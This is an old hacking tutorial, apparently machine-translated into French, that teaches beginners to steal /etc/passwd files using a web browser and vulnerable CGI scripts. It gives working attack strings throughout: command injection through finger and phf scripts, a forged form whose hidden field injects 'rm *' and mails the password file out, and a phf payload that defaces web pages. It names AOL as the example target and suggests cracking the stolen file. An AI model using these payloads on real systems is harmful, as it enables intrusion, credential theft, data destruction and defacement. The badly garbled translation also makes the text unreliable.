|
Hacking du Web Browser
par
Technophoria
I - introduction
Ce fichier décrira plusieurs techniques à aquire
un fichier de mot de passe juste en employant un navigateur Internet
ordinaire. L'information fournie sera la meilleure décrite
pour le pirate informatique de débutant, mais tous les
pirates informatiques doivent benifit de cette information. Nous
ferons cov
Er phf dans ce fichier mais, n'hésitez pas à explorer
d'autres programmes dans la liste d'adresses cgi comme nph-test-cgi
ou l'essai - cgi. Et maintenant... Obtenez confortable... Asseyez-vous....
Et lisez.
II - Taillant de votre Navigateur du Web
Il y a plusieurs techniques sur ce que j'appelle "le
Haching de Navigateur du Web". Beaucoup de débutants
dont savent que vous inclinez la question un fichier etc/passwd
de votre navigateur et dans ce chapitre I décrira toutes
les voies à aquire un fichier passwd. D'abord vous avez
besoin de trouver une boîte t
Le chapeau dirige le fichier cgi-bin/phf sur leur système.
Une grande façon de découvrir sans procès{*essai*}
et l'erreur est d'aller à www.altavista.com et chercher
juste sur la cgi-poubelle ET perl.exe ou la cgi-poubelle ET phf.
a. Haching de boîte de doigt :
Laisse disent que vous avez voulu faire irruption quelque part
comme.... Hmmmm AOL. La première chose que nous ferions
est tapent leur site Web dans l'URL : Http://www.aol.com. La
chose suivante que nous ferions est ajoutent /cgi-bin/finger
au tissu URL donc il ressemblerait à cela Http://www.aol.com/cgi-bin/finger.
Si la porte de doigt est opérationnelle une boîte
doit sembler pour vous entrer au nom que vous voulez au doigt.
Si c'est opérationnel vous avez une chance pour recevoir
le fichier etc/passwd. La chose suivante que vous voudrez probablement
faire est la recherche
Pour un mailto sur la page Web... Parcourez juste la page
pour n'importe quel mailto refs. Retournez à la boîte
de doigt et tapez cette question ...... nobody@nowhere.org; /bin/mail
me@junk.org < etc/passwd... Cette corde{*série*} ne
prend personne et envoie par courrier électronique le
fichier passwd à votre email
Adresse. Si cela travaille vous avez maintenant le fichier etc/passwd
dans votre boîte aux lettres.... Vous pouvez maintenant
diriger un programme de première classe contre cela et
avoir un petit amusement sur leur boîte.
b. La question de cgi-bin/phf commune :
Cette section est pendant le commencement même le pirate
informatique (Tous les pirates informatiques avancés n'a
pas besoin de s'appliquer) Laisse prennent même scenerio
du premier exemple sauf dans l'URL que nous taperions... Http://www.aol.com/cgi-bin/phf...
Si le phf est opérationnel et n'a pas été
le rem
Sur vous doit faire une série de boîtes de recherche
à la page suivante (ignorer ces boîtes) à
votre URL vous ajouteriez cette corde{*série*} ? Qalias=x%0a/bin/cat%20/etc/passwd...
Donc la corde{*série*} entière ressemblerait à
ce Http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20
/etc/passwd. Cette corde{*série*} imprimera le détroit
de fichier etc/passwd à votre navigateur Internet tout
que vous avez besoin de faire est le sauve{*économise*}
comme un fichier et dirige de nouveau un programme de première
classe contre cela. (Cela considère qu'ils ne sont pas
:* : ou :x :).
c. Ne prendre pas ma forme de cgi :
Cette section expliquera comment employer quelqu'un d'autre la
forme de cgi pour obtenir le fichier etc/passwd. Laisse disent
que vous regardez une source de document d'une page Web et trouvez
cela dans la source :
<html><body>
<h2>This is a form to go to Modify</h2>
<form action = "http://www.aol.com/cgi-bin/doc.pl"
method="get">
<input type="hidden" name="myaddress"
value="nobody@aol.com">
<input type="text" name="input">
<input type="submit" value="send">
</form>
</body></html>
C'est une forme simple qui demande à un utilisateur à
l'entrée un message d'être envoyée à
un scénario appelé doc.pl. Inclus dans le scénario
doc.pl est la ligne suivante qui assume que la ligne a déjà
été faite l'analyse syntaxique de.
system("/usr/lib/sendmail -t $myaddress < $tempfile")
Laisse maintenant pour fonder votre page :
<html><body>
<h2>Hack AOL</h2>
<form action = "http://www.aol.com/cgi-bin/doc.pl"
method = "get">
<input type="hidden" name="myaddress"
value=" ; rm * ;mail -s file youraddress@yourisp.com <
/etc/passwd;">
<input type = "text" name="input">
<input type = "submit" value=:"getpasswd">
</form>
Les points-virgules dans le champ{*domaine*} de valeur caché
agissent comme des délimiteurs, ils séparent les
commandes UNIX, cela exécute des commandes sur la même
ligne. Le système appelle PERL et crée une coquille{*obus*}
UNIX et dans vous expédie ici par la poste le fichier
passwd.
d. Changement de pages Web de votre navigateur :
Cette section courte décrira la corde{*série*}
pour employer pour éditer une page Web de votre navigateur
Internet. Même scénario que la première section....
http://www.aol.com.... Nous ajouterons alors la corde{*série*}
suivante cgi-bin/phf ? Qalias=x%0a/bin/echo%20 "quelque
texte et merde" %2
0> > filename.html ...... Cette corde{*série*} vous
permettront d'écrire au filename.html et ajouteront "quelque
texte et merde" être noté qu'il doit être
dans le format HTML. Vous pouvez placer le texte, des images
ou quoi que vous aimez.
III - Conclusion
Cette information doit être capable d'adresser{*diriger*}
un débutant dans l'obtention du fichier etc/passwd d'un
système employant le navigateur Internet... Il peut aussi
informer les pirates informatiques et avancés du gourou
quelques particules d'information de perl et cgi. Dans la nouvelle
lecture vérifient ma seconde
Ond le fichier qui impliquera des fichiers de rondin d'effacement
du navigateur Internet. J'espère que vous tous avez aimé
cette documentation et l'avez trouvé ...... quelque peu
intéressant se réveille!!! Ainsi je me conclus.....
Modifier.
IV - Lecture Suggérée
Phrack Magazine : très informatif.... Couvre à
peu près tout de phreaking au haching.... Téléchargez
juste tous les articles damnés.
En construisant Coupe-feux{*firewalls*} d'Internet par O'Reilly
et Associés, Inc. Aka "la Grande Porte En bois"
": Couvre toutes les sortes d'attaques, des solutions de
firewall différentes et invulnerabiliter
Perl en 21 jours par Samsnet : le bon livre de départ
dans Perl programmant couvre aussi des publications de sécurité.
Cgi programmation par Samsnet : le bon démarreur pour
Cgi mais si vous dont sait Perl ou C programmant alors dont se
donne la peine, couvre aussi des publications de sécurité.
http://www.technophoria.com |
|
